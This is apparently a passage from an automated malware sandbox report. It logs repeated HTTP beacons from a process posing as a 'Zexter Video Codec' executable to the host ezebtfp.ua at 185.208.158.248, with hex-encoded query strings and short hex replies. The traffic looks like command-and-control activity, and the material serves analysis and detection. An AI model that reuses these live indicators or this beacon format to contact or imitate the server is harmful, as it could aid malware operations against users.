                                                                                                    Oct 3, 2024 08:40:20.536375999 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:21.226202011 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:21 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    20192.168.2.549734185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:21.346004009 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:22.025324106 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:21 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:22.137379885 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:22.376693010 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:22 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    21192.168.2.549735185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:22.502600908 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:23.198024035 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:23 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:23.308926105 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:23.545742035 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:23 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:23.653604984 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:23.890561104 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:23 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    22192.168.2.549736185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:24.018596888 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:24.748857021 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:24 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:24.856023073 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:25.094882965 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    23192.168.2.549737185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:25.221575022 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:25.951258898 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:26.059247017 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:26.309604883 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:26 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:26.418903112 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:26.660608053 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:26 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    24192.168.2.549738185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:26.783632040 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:27.473336935 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    25192.168.2.549739185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:27.596875906 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:28.280956030 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:28 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    26192.168.2.549740185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:28.413230896 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:29.573659897 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:29.574014902 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:29.574028969 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:29.684413910 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:29.920331001 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:30.028692961 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:30.273920059 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:30 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    27192.168.2.549741185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:30.393368959 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:31.086678028 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:30 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    28192.168.2.549742185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:31.266186953 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:31.954016924 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    29192.168.2.549743185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:32.081784010 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:32.796659946 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    30192.168.2.549744185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:32.924369097 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:33.609812975 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:33 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    31192.168.2.549745185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:33.736789942 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:34.425209999 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:34 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    32192.168.2.549746185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:34.564533949 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:35.273886919 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:35 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    33192.168.2.549747185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:35.393002987 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:36.073275089 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:35 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:36.184425116 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
